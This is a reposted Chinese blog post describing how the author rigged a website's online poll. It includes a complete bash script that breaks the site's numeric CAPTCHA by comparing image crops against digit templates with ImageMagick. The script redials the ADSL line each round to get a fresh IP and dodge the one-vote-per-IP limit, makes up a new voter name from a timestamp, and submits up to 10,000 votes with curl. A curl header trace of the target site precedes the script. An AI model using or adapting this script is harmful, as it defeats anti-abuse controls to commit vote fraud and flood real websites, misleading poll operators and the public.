验证码识别与自动灌水（http://blog.csdn.net/deadcat/archive/2007/02/15）

alex8946

浏览: 369828 次
性别:
来自: 广东广州

最近访客更多访客>>

gongchuanbo

zhoudinghan

yslyjbls

yang2978

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

博客分类：

其他资料

.net Blog Linux Debian Bash

近来，一个朋友请我帮他在某个网站投票。投票程序设立了验证码，并且限制每个IP每天只能投一票。我是在debian sarge 3.1下面通过ADSL拨号上网的，IP限制可以通过重新拨号轻松搞定。网上有人说使用代理也可以，但是我找了很久，发现网上列出的大部分代理服务器都已经无法访问。好了，下面的问题主要就是识别验证码和自动投票了。

网上有很多关于验证码识别的方法和思路，不过大部分都是在windows下面运行的。在linux下面有一个很有名的图片处理软件叫imagemagick。这个软件支持非常多的图片格式已经更多的图片处理方法，请看这里的图片效果：

我的思路是，首先找到含有验证码的图片，把背景、杂色、条纹等干扰因素去掉，并把图片转化为黑白象素，以便于处理。然后分析图片上每个文字的位置，精确的把整个图片分割成包含每个文字的小图片。我关注的这个投票网站上的验证码是有0到9这十个数字构成了，我就用GIMP——是的，GIMP是linux下面不可多得的图像处理软件——打开验证码图片，把十个数字一一截取下来，并且分别命名为0.jpg到9.jpg。截取的时候一定要注意，每个文字最好留一点边框，并且在截取后的小图片上要居中，这样更利于排除干扰，提高识别率。为了提高准确率，我把用GIMP把验证码放大到1600倍以后对每个象素进行处理。等要识别图片上验证码的时候，使用相同的位置截取图片上的文字，然后和刚才保存的十个小图片一一对比，与之差异最小的那个图片的序号就是该位置上的文字了。ImageMagick在命令行下面运行，支持MAE，MSE，PSE，PSNR，RMSE等多种比较方式。根据图片中干扰的情况，选择一种最合适的方式，或者用多种方式逐步处理以后进行比较，验证码就可以轻松识别了。放大1600倍获取准确位置

至于识别验证码后进行自动灌水就很简单了。linux下面有一个更强大的工具curl，它可以通过HTTP，FTP，HTTPS等多种方式访问远程服务器，自动上传或下载数据。首先用curl查看其HTTP头信息


 1  * About to connect() to xxxx.com port 80
 2  *   Trying xxx.xxx.xxx.xxx... * connected
 3  * Connected to xxxx.com (xxx.xxx.xxx.xxx) port 80
 4  > GET / HTTP/1.1
 5  User-Agent: curl/7.13.1 (debian-linux-gnu) libcurl/7.13.1 OpenSSL/0.9.7e zlib/1.2.2.2 libidn/0.5.13
 6  Host: xxxx.com
 7  Pragma: no-cache
 8  Accept: */*
 9
10  < HTTP/1.1 302 Moved Temporarily
11  < Via: 1.1 PROXY
12  < Connection: Keep-Alive
13  < Proxy-Connection: Keep-Alive
14  < Transfer-Encoding: chunked
15  < Date: Tue, 04 Jul 2006 05:55:16 GMT
16  < Location: http://xxxx.com/queryVote.do?type=netvotes&Group=1
17  < Content-Type: text/html;charset=gb2312
18  < Server: WebLogic Server 8.1 SP2 Fri Dec 5 15:01:51 PST 2003 316284
19  < Set-Cookie: JSESSIONID=EqCEDyCC2JGex2sLoT231l6NP38OStZaFf9zLSHUxb2MxrqLBE1i!1559900188; path=/

java 代码
<html></html>22  <head></head>23  "Content-Type" content="text/html; charset=gb2312">24  25  26  "#FFFFFF">27  ...28  29  3031    


32  * Connection #0 to host xxxx.com left intact
33  * Closing connection #0
34

从第19行中可以看出，改站点使用了JSESSION这个cookie。查看投票页面的源代码，我发现投票时使用了POST方法，有五个表单项目需要提交。我把这些都记录下来，构成一个POST字符串就可以了。

上面所说的很罗嗦，还是看我写的代码吧（源网址被改成了xxxx.com）


  1  #!/bin/bash
  2
  3  #exec 1> curl.log
  4
  5  function parse
  6  {
  7          ret=
  8          file=$1
  9          convert $file.jpeg -crop 9x13+1+2  $file-a.jpeg
 10          convert $file.jpeg -crop 9x13+10+2  $file-b.jpeg
 11          convert $file.jpeg -crop 9x13+19+2  $file-c.jpeg
 12          convert $file.jpeg -crop 9x13+28+2  $file-d.jpeg
 13          for pic in {a,b,c,d}
 14          do
 15                  dB=1000000000 # a very high value
 16                  value=10
 17                  for num in {0,1,2,3,4,5,6,7,8}
 18                  do
 19                          curr=`compare -metric PSE $file-$pic.jpeg xj-$num.jpeg null: | awk '{print $1}'`
 20                          small=`echo "$curr < $dB" | bc`
 21                          if [ $small -eq 1 ]; then
 22                                  value=$num
 23                                  dB=$curr
 24                          fi
 25                  done
 26                  ret=$ret$value
 27          done
 28          rm -fr $file-[abcd].jpeg
 29          echo $ret
 30  }
 31
 32
 33  hit=0
 34  for((i=1;i<10000;i++))
 35  do
 36          pon dsl-provider > /dev/null 2> curl.log
 37          sleep 3
 38          curl -s \
 39                  -c cookie \
 40                  -j \
 41                  -A "Mozilla/4.0" \
 42                  http://xxxx.com/MakeEXPWD > code.jpeg
 43          code=$(parse code)
 44          curl -s \
 45                  -b cookie \
 46                  -d "tid=35" \
 47                  -d "name=jerry$(date +%s)" \
 48                  -d "certify=310902790504054" \
 49                  -d "tele=23493451" \
 50                  -d "authcode=$code" \
 51                  -d "send=%20" \
 52                  -e http://xxxx.com/VoteForm.jsp?tID=35 \
 53                  -A "Mozilla/4.0" \
 54                  http://xxxx.com/vote.do | grep -q '投票成功'
 55          if [ $? -eq 0 ]; then
 56                  hit=$(($hit + 1))
 57                  echo -n -e "Total: $i, Hit $hit, Last: $code\r"
 58          else true
 59          fi
 60          rm -fr code.jpeg
 61          poff dsl-provider > /dev/null 2> curl.log
 62  done
 63  exit 0
 64

代码中第三行表示把整个程序的输出重定向到文件，可以用于无人值守的批量运行时。如果程序中有很多输入，这样做就可以不必逐一对每个输出的重定向了。
下面是parse函数，用于对获取到的图片进行识别。分析时，首先截取图片的预定区域，并与准备好的小图片逐一比较，取参数中的最值，其对应的小图片就是该位置的文字了。比较时使用到了浮点运算，这是bash的弱势所在，所以要用bc进行高精度计算。比较两个图片所用的compare命令支持很复杂的参数和诸如MAE，MSE，PSE，PSNR，RMSE等多种方式，这里只是用了其中一种。
函数之后就是程序的主循环部分。每次循环时都把adsl断线并重新拨号。从拨号成功到数据能够正常传输之间可能有一段延误时间，所以要sleep一会儿。
下面的第一个curl有两个作用：首先，它从目标网站获取含有验证码的图片；另外，它还取得了当前连接的cookie，并且初始化服务器端的session。其中的-j参数表示每次拨号都抛弃以前的cookie。
第二个curl使用了刚才取得的cookie，使用post方法向目标站点提交投票数据。其中的name是投票人的姓名，投票程序规定相同的名字只能投一票，所以我干脆把用时间来表示了。在投票以后的返回页面中检查“投票成功”四个字，如果有则表示本次投票已成功，计数器加一。第55行的$?就表示上一个命令的返回值：找到关键词时返回0。
每次操作结束以后都要把临时文件删除，同时更新状态行。echo命令加上-n参数表示输出信息后不换行；再加上一个控制字符\r，可以不断更新当前的提示行，而不是一行一行的输出程序运行结果，这样看起来更简洁一些。

分享到：

Post/Get方式获取Web页面 | 验证码的破解思路！

2007-08-07 22:06
浏览 4960
评论(2)
查看更多

2 楼 luzl 2009-03-26

很是牛叉！

1 楼 lenj 2008-09-19

眼睛都看花了这个颜色

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论